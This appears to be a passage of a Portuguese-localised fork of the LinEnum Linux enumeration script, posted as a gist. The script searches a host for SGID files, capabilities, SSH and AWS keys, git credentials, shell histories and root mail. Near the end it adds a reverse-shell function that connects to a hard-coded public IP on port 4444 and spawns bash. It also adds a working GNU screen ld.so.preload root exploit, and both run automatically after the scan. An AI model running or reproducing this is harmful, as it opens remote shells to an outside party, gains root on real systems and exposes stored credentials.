| for i in $findsgid; do cp $i $format/sgid-files/; done 2>/dev/null | |
| fi | |
| #list of 'interesting' sgid files | |
| intsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null` | |
| if [ "$intsgid" ]; then | |
| echo -e "Possiveis arquivos vulneraveis SGID\n$intsgid" | |
| echo -e "\n" | |
| fi | |
| #lists world-writable sgid files | |
| wwsgid=`find $allsgid -perm -2002 -type f -exec ls -la {} 2>/dev/null \;` | |
| if [ "$wwsgid" ]; then | |
| echo -e "Leitura/Escrita SGID\n$wwsgid" | |
| echo -e "\n" | |
| fi | |
| #lists world-writable sgid files owned by root | |
| wwsgidrt=`find $allsgid -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;` | |
| if [ "$wwsgidrt" ]; then | |
| echo -e "Arquivos SGID de root\n$wwsgidrt" | |
| echo -e "\n" | |
| fi | |
| #list all files with POSIX capabilities set along with there capabilities | |
| fileswithcaps=`getcap -r / 2>/dev/null || /sbin/getcap -r / 2>/dev/null` | |
| if [ "$fileswithcaps" ]; then | |
| echo -e "Arquivos POSIX\n$fileswithcaps" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$fileswithcaps" ]; then | |
| mkdir $format/files_with_capabilities/ 2>/dev/null | |
| for i in $fileswithcaps; do cp $i $format/files_with_capabilities/; done 2>/dev/null | |
| fi | |
| #searches /etc/security/capability.conf for users associated capapilies | |
| userswithcaps=`grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null` | |
| if [ "$userswithcaps" ]; then | |
| echo -e "Especificos arquivos POSIX\n$userswithcaps" | |
| echo -e "\n" | |
| fi | |
| if [ "$userswithcaps" ] ; then | |
| #matches the capabilities found associated with users with the current user | |
| matchedcaps=`echo -e "$userswithcaps" | grep \`whoami\` | awk '{print $1}' 2>/dev/null` | |
| if [ "$matchedcaps" ]; then | |
| echo -e "Arquivos POSIX associados ao usuario atual\n$matchedcaps" | |
| echo -e "\n" | |
| #matches the files with capapbilities with capabilities associated with the current user | |
| matchedfiles=`echo -e "$matchedcaps" | while read -r cap ; do echo -e "$fileswithcaps" | grep "$cap" ; done 2>/dev/null` | |
| if [ "$matchedfiles" ]; then | |
| echo -e "Arquivos do usuario atual\n$matchedfiles" | |
| echo -e "\n" | |
| #lists the permissions of the files having the same capabilies associated with the current user | |
| matchedfilesperms=`echo -e "$matchedfiles" | awk '{print $1}' | while read -r f; do ls -la $f ;done 2>/dev/null` | |
| echo -e "Permissoes do usuario atual\n$matchedfilesperms" | |
| echo -e "\n" | |
| if [ "$matchedfilesperms" ]; then | |
| #checks if any of the files with same capabilities associated with the current user is writable | |
| writablematchedfiles=`echo -e "$matchedfiles" | awk '{print $1}' | while read -r f; do find $f -writable -exec ls -la {} + ;done 2>/dev/null` | |
| if [ "$writablematchedfiles" ]; then | |
| echo -e "Usuario/Grupo atual\n$writablematchedfiles" | |
| echo -e "\n" | |
| fi | |
| fi | |
| fi | |
| fi | |
| fi | |
| #look for private keys - thanks djhohnstein | |
| if [ "$thorough" = "1" ]; then | |
| privatekeyfiles=`grep -rl "Chave Privada" /home 2>/dev/null` | |
| if [ "$privatekeyfiles" ]; then | |
| echo -e "Chave SSH privada encontrada\n$privatekeyfiles" | |
| echo -e "\n" | |
| fi | |
| fi | |
| #look for AWS keys - thanks djhohnstein | |
| if [ "$thorough" = "1" ]; then | |
| awskeyfiles=`grep -rli "aws_secret_access_key" /home 2>/dev/null` | |
| if [ "$awskeyfiles" ]; then | |
| echo -e "AWS secret keys encontrada\n$awskeyfiles" | |
| echo -e "\n" | |
| fi | |
| fi | |
| #look for git credential files - thanks djhohnstein | |
| if [ "$thorough" = "1" ]; then | |
| gitcredfiles=`find / -name ".git-credentials" 2>/dev/null` | |
| if [ "$gitcredfiles" ]; then | |
| echo -e "Credenciais Git\n$gitcredfiles" | |
| echo -e "\n" | |
| fi | |
| fi | |
| #list all world-writable files excluding /proc and /sys | |
| if [ "$thorough" = "1" ]; then | |
| wwfiles=`find / ! -path "*/proc/*" ! -path "/sys/*" -perm -2 -type f -exec ls -la {} 2>/dev/null \;` | |
| if [ "$wwfiles" ]; then | |
| echo -e "Arquivos com escrita/leitura (excluindo /proc and /sys):\n$wwfiles" | |
| echo -e "\n" | |
| fi | |
| fi | |
| if [ "$thorough" = "1" ]; then | |
| if [ "$export" ] && [ "$wwfiles" ]; then | |
| mkdir $format/ww-files/ 2>/dev/null | |
| for i in $wwfiles; do cp --parents $i $format/ww-files/; done 2>/dev/null | |
| fi | |
| fi | |
| #are any .plan files accessible in /home (could contain useful information) | |
| usrplan=`find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;` | |
| if [ "$usrplan" ]; then | |
| echo -e "Permissoes e conteudos em texto plano\n$usrplan" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$usrplan" ]; then | |
| mkdir $format/plan_files/ 2>/dev/null | |
| for i in $usrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null | |
| fi | |
| bsdusrplan=`find /usr/home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;` | |
| if [ "$bsdusrplan" ]; then | |
| echo -e "Arquivos expostos\n$bsdusrplan" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$bsdusrplan" ]; then | |
| mkdir $format/plan_files/ 2>/dev/null | |
| for i in $bsdusrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null | |
| fi | |
| #are there any .rhosts files accessible - these may allow us to login as another user etc. | |
| rhostsusr=`find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` | |
| if [ "$rhostsusr" ]; then | |
| echo -e "rhosts arquivos\n$rhostsusr" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$rhostsusr" ]; then | |
| mkdir $format/rhosts/ 2>/dev/null | |
| for i in $rhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null | |
| fi | |
| bsdrhostsusr=`find /usr/home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` | |
| if [ "$bsdrhostsusr" ]; then | |
| echo -e "Arquivos de configuracao do usuario remoto\n$bsdrhostsusr" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$bsdrhostsusr" ]; then | |
| mkdir $format/rhosts 2>/dev/null | |
| for i in $bsdrhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null | |
| fi | |
| rhostssys=`find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` | |
| if [ "$rhostssys" ]; then | |
| echo -e "Hosts.env\n$rhostssys" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$rhostssys" ]; then | |
| mkdir $format/rhosts/ 2>/dev/null | |
| for i in $rhostssys; do cp --parents $i $format/rhosts/; done 2>/dev/null | |
| fi | |
| #list nfs shares/permisisons etc. | |
| nfsexports=`ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null` | |
| if [ "$nfsexports" ]; then | |
| echo -e "Detalhes da configuracao NFS\n$nfsexports" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$nfsexports" ]; then | |
| mkdir $format/etc-export/ 2>/dev/null | |
| cp /etc/exports $format/etc-export/exports 2>/dev/null | |
| fi | |
| if [ "$thorough" = "1" ]; then | |
| #phackt | |
| #displaying /etc/fstab | |
| fstab=`cat /etc/fstab 2>/dev/null` | |
| if [ "$fstab" ]; then | |
| echo -e "NFS Particoes e detalhes" | |
| echo -e "$fstab" | |
| echo -e "\n" | |
| fi | |
| fi | |
| #looking for credentials in /etc/fstab | |
| fstab=`grep username /etc/fstab 2>/dev/null |awk '{sub(/.*\username=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo username: 2>/dev/null; grep password /etc/fstab 2>/dev/null |awk '{sub(/.*\password=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo password: 2>/dev/null; grep domain /etc/fstab 2>/dev/null |awk '{sub(/.*\domain=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo domain: 2>/dev/null` | |
| if [ "$fstab" ]; then | |
| echo -e "Procurando credenciais em /etc/fstab!\n$fstab" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$fstab" ]; then | |
| mkdir $format/etc-exports/ 2>/dev/null | |
| cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null | |
| fi | |
| fstabcred=`grep cred /etc/fstab 2>/dev/null |awk '{sub(/.*\credentials=/,"");sub(/\,.*/,"")}1' 2>/dev/null | xargs -I{} sh -c 'ls -la {}; cat {}' 2>/dev/null` | |
| if [ "$fstabcred" ]; then | |
| echo -e "fstab contem credenciais\n$fstabcred" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$fstabcred" ]; then | |
| mkdir $format/etc-exports/ 2>/dev/null | |
| cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null | |
| fi | |
| #use supplied keyword and cat *.conf files for potential matches - output will show line number within relevant file path where a match has been located | |
| if [ "$keyword" = "" ]; then | |
| echo -e "[-] Procurando arquivos *.conf\n" | |
| else | |
| confkey=`find / -maxdepth 4 -name *.conf -type f -exec grep -Hn $keyword {} \; 2>/dev/null` | |
| if [ "$confkey" ]; then | |
| echo -e "\e[00;31m[-] Find keyword ($keyword)\n$confkey" | |
| echo -e "\n" | |
| else | |
| echo -e "\e[00;31m[-] Find keyword ($keyword) in .conf files (recursive 4 levels):\e[00m" | |
| echo -e "'$keyword' not found in any .conf files" | |
| echo -e "\n" | |
| fi | |
| fi | |
| if [ "$keyword" = "" ]; then | |
| : | |
| else | |
| if [ "$export" ] && [ "$confkey" ]; then | |
| confkeyfile=`find / -maxdepth 4 -name *.conf -type f -exec grep -lHn $keyword {} \; 2>/dev/null` | |
| mkdir --parents $format/keyword_file_matches/config_files/ 2>/dev/null | |
| for i in $confkeyfile; do cp --parents $i $format/keyword_file_matches/config_files/ ; done 2>/dev/null | |
| fi | |
| fi | |
| #use supplied keyword and cat *.php files for potential matches - output will show line number within relevant file path where a match has been located | |
| if [ "$keyword" = "" ]; then | |
| echo -e "[-] Procurando arquivos *.php\n" | |
| else | |
| phpkey=`find / -maxdepth 10 -name *.php -type f -exec grep -Hn $keyword {} \; 2>/dev/null` | |
| if [ "$phpkey" ]; then | |
| echo -e "\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels - output format filepath:identified line number where keyword appears):\e[00m\n$phpkey" | |
| echo -e "\n" | |
| else | |
| echo -e "\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels):\e[00m" | |
| echo -e "'$keyword' not found in any .php files" | |
| echo -e "\n" | |
| fi | |
| fi | |
| if [ "$keyword" = "" ]; then | |
| : | |
| else | |
| if [ "$export" ] && [ "$phpkey" ]; then | |
| phpkeyfile=`find / -maxdepth 10 -name *.php -type f -exec grep -lHn $keyword {} \; 2>/dev/null` | |
| mkdir --parents $format/keyword_file_matches/php_files/ 2>/dev/null | |
| for i in $phpkeyfile; do cp --parents $i $format/keyword_file_matches/php_files/ ; done 2>/dev/null | |
| fi | |
| fi | |
| #use supplied keyword and cat *.log files for potential matches - output will show line number within relevant file path where a match has been located | |
| if [ "$keyword" = "" ];then | |
| echo -e "[-] Procurando arquivos *.log\n" | |
| else | |
| logkey=`find / -maxdepth 4 -name *.log -type f -exec grep -Hn $keyword {} \; 2>/dev/null` | |
| if [ "$logkey" ]; then | |
| echo -e "\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$logkey" | |
| echo -e "\n" | |
| else | |
| echo -e "\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels):\e[00m" | |
| echo -e "'$keyword' not found in any .log files" | |
| echo -e "\n" | |
| fi | |
| fi | |
| if [ "$keyword" = "" ];then | |
| : | |
| else | |
| if [ "$export" ] && [ "$logkey" ]; then | |
| logkeyfile=`find / -maxdepth 4 -name *.log -type f -exec grep -lHn $keyword {} \; 2>/dev/null` | |
| mkdir --parents $format/keyword_file_matches/log_files/ 2>/dev/null | |
| for i in $logkeyfile; do cp --parents $i $format/keyword_file_matches/log_files/ ; done 2>/dev/null | |
| fi | |
| fi | |
| #use supplied keyword and cat *.ini files for potential matches - output will show line number within relevant file path where a match has been located | |
| if [ "$keyword" = "" ];then | |
| echo -e "[-] Procurando arquivos *.ini\n" | |
| else | |
| inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -Hn $keyword {} \; 2>/dev/null` | |
| if [ "$inikey" ]; then | |
| echo -e "\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$inikey" | |
| echo -e "\n" | |
| else | |
| echo -e "\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels):\e[00m" | |
| echo -e "'$keyword' not found in any .ini files" | |
| echo -e "\n" | |
| fi | |
| fi | |
| if [ "$keyword" = "" ];then | |
| : | |
| else | |
| if [ "$export" ] && [ "$inikey" ]; then | |
| inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -lHn $keyword {} \; 2>/dev/null` | |
| mkdir --parents $format/keyword_file_matches/ini_files/ 2>/dev/null | |
| for i in $inikey; do cp --parents $i $format/keyword_file_matches/ini_files/ ; done 2>/dev/null | |
| fi | |
| fi | |
| #quick extract of .conf files from /etc - only 1 level | |
| allconf=`find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null` | |
| if [ "$allconf" ]; then | |
| echo -e "Todos os arquivos .conf in /etc\n$allconf" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$allconf" ]; then | |
| mkdir $format/conf-files/ 2>/dev/null | |
| for i in $allconf; do cp --parents $i $format/conf-files/; done 2>/dev/null | |
| fi | |
| #extract any user history files that are accessible | |
| usrhist=`ls -la ~/.*_history 2>/dev/null` | |
| if [ "$usrhist" ]; then | |
| echo -e "Arquivos e history do usuario atual\n$usrhist" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$usrhist" ]; then | |
| mkdir $format/history_files/ 2>/dev/null | |
| for i in $usrhist; do cp --parents $i $format/history_files/; done 2>/dev/null | |
| fi | |
| #can we read roots *_history files - could be passwords stored etc. | |
| roothist=`ls -la /root/.*_history 2>/dev/null` | |
| if [ "$roothist" ]; then | |
| echo -e "Arquivos e history do root\n$roothist" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$roothist" ]; then | |
| mkdir $format/history_files/ 2>/dev/null | |
| cp $roothist $format/history_files/ 2>/dev/null | |
| fi | |
| #all accessible .bash_history files in /home | |
| checkbashhist=`find /home -name .bash_history -print -exec cat {} 2>/dev/null \;` | |
| if [ "$checkbashhist" ]; then | |
| echo -e "Localizao e conteudo do .bash_history.\n$checkbashhist" | |
| echo -e "\n" | |
| fi | |
| #any .bak files that may be of interest | |
| bakfiles=`find / -name *.bak -type f 2</dev/null` | |
| if [ "$bakfiles" ]; then | |
| echo -e "Localizacao e permissoes do .bak file(s):" | |
| for bak in `echo $bakfiles`; do ls -la $bak;done | |
| echo -e "\n" | |
| fi | |
| #is there any mail accessible | |
| readmail=`ls -la /var/mail 2>/dev/null` | |
| if [ "$readmail" ]; then | |
| echo -e "Qualquer arquivo interessante em /var/mail:\n$readmail" | |
| echo -e "\n" | |
| fi | |
| #can we read roots mail | |
| readmailroot=`head /var/mail/root 2>/dev/null` | |
| if [ "$readmailroot" ]; then | |
| echo -e "Nos podemos ler /var/mail/root!\n$readmailroot" | |
| echo -e "\n" | |
| fi | |
| if [ "$export" ] && [ "$readmailroot" ]; then | |
| mkdir $format/mail-from-root/ 2>/dev/null | |
| cp $readmailroot $format/mail-from-root/ 2>/dev/null | |
| fi | |
| } | |
| docker_checks() | |
| { | |
| #specific checks - check to see if we're in a docker container | |
| dockercontainer=` grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null` | |
| if [ "$dockercontainer" ]; then | |
| echo -e "Conteudos em docker\n$dockercontainer" | |
| echo -e "\n" | |
| fi | |
| #specific checks - check to see if we're a docker host | |
| dockerhost=`docker --version 2>/dev/null; docker ps -a 2>/dev/null` | |
| if [ "$dockerhost" ]; then | |
| echo -e "Hosts no docker\n$dockerhost" | |
| echo -e "\n" | |
| fi | |
| #specific checks - are we a member of the docker group | |
| dockergrp=`id | grep -i docker 2>/dev/null` | |
| if [ "$dockergrp" ]; then | |
| echo -e "Somos membros do docker?\n$dockergrp" | |
| echo -e "\n" | |
| fi | |
| #specific checks - are there any docker files present | |
| dockerfiles=`find / -name Dockerfile -exec ls -l {} 2>/dev/null \;` | |
| if [ "$dockerfiles" ]; then | |
| echo -e "Qualquer coisa em dockerfile\n$dockerfiles" | |
| echo -e "\n" | |
| fi | |
| #specific checks - are there any docker files present | |
| dockeryml=`find / -name docker-compose.yml -exec ls -l {} 2>/dev/null \;` | |
| if [ "$dockeryml" ]; then | |
| echo -e "Dockercompose\n$dockeryml" | |
| echo -e "\n" | |
| fi | |
| } | |
| lxc_container_checks() | |
| { | |
| #specific checks - are we in an lxd/lxc container | |
| lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null` | |
| if [ "$lxccontainer" ]; then | |
| echo -e "LXC Container\n$lxccontainer" | |
| echo -e "\n" | |
| fi | |
| #specific checks - are we a member of the lxd group | |
| lxdgroup=`id | grep -i lxd 2>/dev/null` | |
| if [ "$lxdgroup" ]; then | |
| echo -e "grupo lxd\n$lxdgroup" | |
| echo -e "\n" | |
| fi | |
| } | |
| footer() | |
| { | |
| echo -e "Varredura completa" | |
| } | |
| reverse_shell() | |
| { | |
| export RHOST=54.220.244.20 | |
| export RPORT=4444 | |
| python -c 'import sys,socket,os,pty;s=socket.socket() | |
| s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) | |
| [os.dup2(s.fileno(),fd) for fd in (0,1,2)] | |
| pty.spawn("/bin/bash")' | |
| } | |
| prive_esc() | |
| { | |
| echo "~ gnu/screenroot ~" | |
| echo "[+] First, we create our shell and library..." | |
| cat << EOF > /tmp/libhax.c | |
| #include <stdio.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| __attribute__ ((__constructor__)) | |
| void dropshell(void){ | |
| chown("/tmp/rootshell", 0, 0); | |
| chmod("/tmp/rootshell", 04755); | |
| unlink("/etc/ld.so.preload"); | |
| printf("[+] done!\n"); | |
| } | |
| EOF | |
| gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c | |
| rm -f /tmp/libhax.c | |
| cat << EOF > /tmp/rootshell.c | |
| #include <stdio.h> | |
| int main(void){ | |
| setuid(0); | |
| setgid(0); | |
| seteuid(0); | |
| setegid(0); | |
| execvp("/bin/sh", NULL, NULL); | |
| } | |
| EOF | |
| gcc -o /tmp/rootshell /tmp/rootshell.c | |
| rm -f /tmp/rootshell.c | |
| echo "[+] Now we create our /etc/ld.so.preload file..." | |
| cd /etc | |
| umask 000 # because | |
| screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed | |
| echo "[+] Triggering..." | |
| screen -ls # screen itself is setuid, so... | |
| /tmp/rootshell | |
| } | |
| call_each() | |
| { | |
| system_info | |
| user_info | |
| environmental_info | |
| job_info | |
| networking_info | |
| services_info | |
| software_configs | |
| interesting_files | |
| docker_checks | |
| lxc_container_checks | |
| footer | |
| reverse_shell | |
| prive_esc | |
| } | |
| while getopts "h:k:r:e:st" option; do | |
| case "${option}" in | |
| k) keyword=${OPTARG};; | |
| r) report=${OPTARG}"-"`date +"%d-%m-%y"`;; | |
| e) export=${OPTARG};; | |
| s) sudopass=1;; | |
| t) thorough=1;; | |
| h) usage; exit;; | |
| *) usage; exit;; | |
| esac | |
| done | |
| call_each | tee -a $report 2> /dev/null | |
| #EndOfScript |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment